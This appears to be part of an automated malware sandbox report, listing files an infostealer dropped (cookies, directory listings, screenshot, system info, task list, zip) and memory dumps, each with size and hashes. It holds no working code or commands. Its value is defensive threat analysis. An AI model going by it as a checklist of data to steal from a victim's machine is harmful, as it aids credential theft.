9abc0f5e43d6c5870e7a5e0e934e0570d3f43db4bd9c62afd0d16c62d4a0515b3398bc1281b24d765d2b076c9c4733f45241f6a2df4df6685737b5141321e5b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\oN4hV.zip

Filesize
426KB

MD5
3ba3c9e9318215e51681a982fc9040f8

SHA1
2f0aabd2f4f2c46980dee874793979633ab4b6da

SHA256
317ecf89f0ee6967f96ab07df092def8e825e8e78fb246a8626ae1537d904c85

SHA512
622d3aedfa1a624cbaa1b872970be8c8643a9ab568cb0a4eacca92e2b94904d40e9118d2c56f1577b8f92c45841d4a1ccede9e93763af5a7cced9b4af8ef5e7c

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‍ ‎ \Credentials\Chrome\Chrome Cookies.txt

Filesize
258B

MD5
3624f761179c54f1aa7b4818e1bf625c

SHA1
d0145ebbaa084171c772187f338f53392b487e90

SHA256
417ed7abaf9355adfb41324f632245bb117ba45127416c03711b08a53130a087

SHA512
6c312efa41cc0dca5c074830e931a2fc2aec4a16657799addf027d76e33ee4173c96be88aca2329c299df66ecf78262d2032a6057626dce827bbaeef014c1896

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‍ ‎ \Directories\Desktop.txt

Filesize
715B

MD5
82882cc2dfab5f99b73076a6b5f78a79

SHA1
bfc2bf43bab00a6c5cba1a2e21936d0b4e1b01a2

SHA256
0ef9b1d773ad2ed4700b139fd9aa5fdfdc1217e98d986d9b82c56fcfaaf8d573

SHA512
4ac8c18a0183220fe547ba26f23e1f26d6240b3a16e833fda888db82f73590f6dcdcbff7cee176e75cccb3708f8ae22fe067bf42929eab8f603979fb52c7c044

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‍ ‎ \Directories\Documents.txt

Filesize
892B

MD5
f1c3b8229b238193472e5e26be052735

SHA1
36cc4ed239941c7d6ec23cef6cbb14be56a25033

SHA256
a0910125863e033966c66a21fae28ffa0a4e7d2816e698ef262236230bf1bea7

SHA512
00c3c820d1384d8e832a5b147b554bedf39ca4335b226d1e9a590bc236439d60e5948f3d1d942c175ec5bdea5bf43137c620a219f25faa10f87d418042e54623

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‍ ‎ \Directories\Downloads.txt

Filesize
768B

MD5
cecc19606097c15ea9f44b72543fa841

SHA1
fb558a40b4a4cb3b2349e13401e3288f47763a8d

SHA256
1c17089c3a27ccbe56bad7f49f85bdaf14a677c22aea5911d5bbddd3e02a0e93

SHA512
b8ed02ca6e2a10eb978ef25be83c1737ad58da647dbdf138746a2289783bf872ede0adf170b8188efa1bb18406bf8aa72852a0fe3ce4301c269e5b30198d24a5

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‍ ‎ \Directories\Music.txt

Filesize
701B

MD5
5b311f12d58db49e94ab488586c2806d

SHA1
40b8fcad74906f5a57255511afeabfbf54a87679

SHA256
d6124e6070b6966ba80326e16761221dc8d37dcff25489bb946fd0bf4733c2ad

SHA512
8eb037c24b8e2608556dbe9db83c86c08726bbc3ab31bef1281c3391b652580caa1101bc3af02fececafb53048a5bd6996be12e61d572c105141205520cc2827

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‍ ‎ \Directories\Pictures.txt

Filesize
862B

MD5
203ae493cc504de085440e90ae0d4bd9

SHA1
35028453444e72a298f8cb49341f3919a799caa8

SHA256
9f43bc6e44741bf3134c8e0b8378eac107540af433e78ca68c7707e27d581057

SHA512
2572d56bad53b0feeecca3e9342f58d6dff15662c332e2237939210242c2276fefb48182c97042b76ab0e3cd4ecf3545e1757861ed62c9dca5e419f1a16be4ca

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‍ ‎ \Directories\Videos.txt

Filesize
30B

MD5
e140e10b2b43ba6f978bee0aa90afaf7

SHA1
bbbeb7097ffa9c2daa3206b3f212d3614749c620

SHA256
c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

SHA512
df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‍ ‎ \Display (1).png

Filesize
422KB

MD5
bc478daa4564acc856835b600b08a9a4

SHA1
7911a755745935d4a4e208655f2da1476e985f29

SHA256
8b851fe82880045e0bc40020c0836d312106cf5e1d4522bd40f701c24284f830

SHA512
2f97e5c4f07c33b625121fe1639a85ea149d1760e1770c38e1f49d2fc11a4893b427e1deeb3c32ed0b466a6ae444ef869eb78815840f7e00761cbd80dbbc42f8

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‍ ‎ \System\MAC Addresses.txt

Filesize
232B

MD5
72c0b338f1b8bb13cbb8a1ea1829fd5d

SHA1
ddd7241377be7b21ba3aecd06ca1c7808cc1fc4a

SHA256
aca481ffcb5077f1987fa59c1c3f6177e9836e4fb47ec9055df9adacb3c9e597

SHA512
57772f4e344bcc064195fe597ff8b9227e4ab7d52c25b895ebb0ecd13959f872abcb25d3392eed8def89fe52df8618a700ae3a70b35079cf4eba8d8f7cdce456

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‍ ‎ \System\System Info.txt

Filesize
2KB

MD5
f35dfcbea860427c61f8766ca7022ce3

SHA1
f9e119473b44d6f80fbd1c4122e4734df8e242aa

SHA256
5d2561cc283c7575ee8e0619058c1a8fbfb2ddb77a96138ebf05ac90e83c1237

SHA512
ac8ef518e95501ce980694dec84458371c0b7692e0dc674fd7d8d734a55fc4f7ed26776be6f654cbf429c14132c27ed1867d6138eb79d34c64db1463903c0ca2

Download Submit
C:\Users\Admin\AppData\Local\Temp\‎‍ ‎ \System\Task List.txt

Filesize
12KB

MD5
3082a1c33a85af84921602223dc6a017

SHA1
1711eb384bfb921b02db1676abcca3e7ea8f3eaf

SHA256
f7d6c407672167faf1593c1f11a04b23c4ebb52c1a3a936b2ce1af62d886b22e

SHA512
4ce735d3e2cc8a98e16ad257e79059bd585ec213e7a554a3ed8f22e0c82f33f12f51f87a92cd787edffb00f45780628b399beababd2a765463e1e8c598846e5c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fmawekip\CSC8D6FD4727B3147308A67139980C92FF.TMP

Filesize
652B

MD5
cb273d0c22abc1cacc3e0b0559b9749f

SHA1
41a81551ed8280b2394ad19151c3e2e6ed350628

SHA256
65c4e9b11afe904ef309d8ba3b2bd5530397c713ef5a1d989ceba7ec17842727

SHA512
d17c23c0acaff8a4ec0206e47fab7429b5212d26f7f45e3c889db67e25d21a17f06d9ea33f4f849b3272eab2dc71f098e1b87bc198d997e8c1b097e49ed339fe

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fmawekip\fmawekip.0.cs

Filesize
1004B

MD5
c76055a0388b713a1eabe16130684dc3

SHA1
ee11e84cf41d8a43340f7102e17660072906c402

SHA256
8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

SHA512
22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fmawekip\fmawekip.cmdline

Filesize
607B

MD5
cdd47d713f226c2886d3cc288f422584

SHA1
3b399a72f862ae4746f26477e33b05a5c7f20d91

SHA256
2f7114bb485316140b2b1c4d45e20b7ed9e10164019f83e7d76a728b2c3c0ca5

SHA512
1fd625fc9f8b055e4f988087015d5c6454d69c59744544f43d9d3aed8457645fc47715e0e02ed3a47f21f0cc71ee12c0f88f526ae83beff7bd0daf32d3d715b0

Download Submit
memory/1328-263-0x000001DB60610000-0x000001DB6082C000-memory.dmp

Filesize
2.1MB

Download
memory/1548-89-0x00000270580E0000-0x0000027058102000-memory.dmp

Filesize
136KB

Download
memory/4804-32-0x00007FF9ACB50000-0x00007FF9ACB5F000-memory.dmp

Filesize
60KB

Download
memory/4804-58-0x00007FF9A5B30000-0x00007FF9A5B54000-memory.dmp

Filesize
144KB

Download
memory/4804-122-0x00007FF9A4210000-0x00007FF9A438F000-memory.dmp

Filesize
1.5MB

Download
memory/4804-103-0x00007FF9A5B30000-0x00007FF9A5B54000-memory.dmp

Filesize
144KB

Download
memory/4804-76-0x00007FF9A8BC0000-0x00007FF9A8BD4000-memory.dmp

Filesize
80KB

Download
memory/4804-78-0x00007FF9A8BE0000-0x00007FF9A8C0D000-memory.dmp

Filesize
180KB

Download
memory/4804-81-0x00007FF9A9950000-0x00007FF9A996A000-memory.dmp

Filesize
104KB

Download
memory/4804-290-0x00007FF995F40000-0x00007FF996604000-memory.dmp

Filesize
6.8MB

Download
memory/4804-82-0x00007FF9A4A90000-0x00007FF9A4BAB000-memory.dmp

Filesize
1.1MB

Download
memory/4804-79-0x00007FF9A9260000-0x00007FF9A926D000-memory.dmp

Filesize
52KB

Download
memory/4804-232-0x00007FF9A5020000-0x00007FF9A5053000-memory.dmp

Filesize
204KB

Download
memory/4804-234-0x00007FF9A4F50000-0x00007FF9A501D000-memory.dmp

Filesize
820KB

Download
memory/4804-235-0x000001E4F4390000-0x000001E4F48B9000-memory.dmp

Filesize
5.2MB

Download
memory/4804-62-0x00007FF9A8CE0000-0x00007FF9A8CF9000-memory.dmp

Filesize
100KB

Download
memory/4804-70-0x00007FF995F40000-0x00007FF996604000-memory.dmp

Filesize
6.8MB

Download
memory/4804-73-0x00007FF995850000-0x00007FF995D79000-memory.dmp

Filesize
5.2MB

Download
memory/4804-74-0x00007FF9A8E00000-0x00007FF9A8E25000-memory.dmp

Filesize
148KB

Download
memory/4804-72-0x000001E4F4390000-0x000001E4F48B9000-memory.dmp

Filesize
5.2MB

Download
memory/4804-71-0x00007FF9A4F50000-0x00007FF9A501D000-memory.dmp

Filesize
820KB

Download
memory/4804-66-0x00007FF9A5020000-0x00007FF9A5053000-memory.dmp

Filesize
204KB

Download
memory/4804-64-0x00007FF9A9A00000-0x00007FF9A9A0D000-memory.dmp

Filesize
52KB

Download
memory/4804-56-0x00007FF9A9950000-0x00007FF9A996A000-memory.dmp

Filesize
104KB

Download
memory/4804-60-0x00007FF9A4210000-0x00007FF9A438F000-memory.dmp

Filesize
1.5MB

Download
memory/4804-124-0x00007FF9A8CE0000-0x00007FF9A8CF9000-memory.dmp

Filesize
100KB

Download
memory/4804-54-0x00007FF9A8BE0000-0x00007FF9A8C0D000-memory.dmp

Filesize
180KB

Download
memory/4804-251-0x00007FF995850000-0x00007FF995D79000-memory.dmp

Filesize
5.2MB

Download
memory/4804-29-0x00007FF9A8E00000-0x00007FF9A8E25000-memory.dmp

Filesize
148KB

Download
memory/4804-25-0x00007FF995F40000-0x00007FF996604000-memory.dmp

Filesize
6.8MB

Download
memory/4804-264-0x00007FF9A8BC0000-0x00007FF9A8BD4000-memory.dmp

Filesize
80KB

Download
memory/4804-281-0x00007FF9A4210000-0x00007FF9A438F000-memory.dmp

Filesize
1.5MB

Download
memory/4804-289-0x00007FF9A4A90000-0x00007FF9A4BAB000-memory.dmp

Filesize
1.1MB

Download
memory/4804-275-0x00007FF995F40000-0x00007FF996604000-memory.dmp

Filesize
6.8MB

Download
memory/4804-276-0x00007FF9A8E00000-0x00007FF9A8E25000-memory.dmp

Filesize
148KB

Download
memory/4804-291-0x00007FF9A8E00000-0x00007FF9A8E25000-memory.dmp

Filesize
148KB

Download
memory/4804-304-0x00007FF9A4A90000-0x00007FF9A4BAB000-memory.dmp

Filesize
1.1MB

Download
memory/4804-305-0x00007FF995850000-0x00007FF995D79000-memory.dmp

Filesize
5.2MB

Download
memory/4804-303-0x00007FF9A9260000-0x00007FF9A926D000-memory.dmp

Filesize
52KB

Download
memory/4804-302-0x00007FF9A8BC0000-0x00007FF9A8BD4000-memory.dmp

Filesize
80KB

Download
memory/4804-300-0x00007FF9A4F50000-0x00007FF9A501D000-memory.dmp

Filesize
820KB

Download
memory/4804-299-0x00007FF9A5020000-0x00007FF9A5053000-memory.dmp

Filesize
204KB

Download
memory/4804-298-0x00007FF9A9A00000-0x00007FF9A9A0D000-memory.dmp

Filesize
52KB

Download
memory/4804-297-0x00007FF9A8CE0000-0x00007FF9A8CF9000-memory.dmp

Filesize
100KB

Download
memory/4804-296-0x00007FF9A4210000-0x00007FF9A438F000-memory.dmp

Filesize
1.5MB

Download
memory/4804-295-0x00007FF9A5B30000-0x00007FF9A5B54000-memory.dmp

Filesize
144KB

Download
memory/4804-294-0x00007FF9A9950000-0x00007FF9A996A000-memory.dmp

Filesize
104KB

Download
memory/4804-293-0x00007FF9A8BE0000-0x00007FF9A8C0D000-memory.dmp

Filesize
180KB

Download
memory/4804-292-0x00007FF9ACB50000-0x00007FF9ACB5F000-memory.dmp

Filesize
60KB

Download
memory/4852-163-0x00000238C33D0000-0x00000238C33D8000-memory.dmp

Filesize
32KB

Download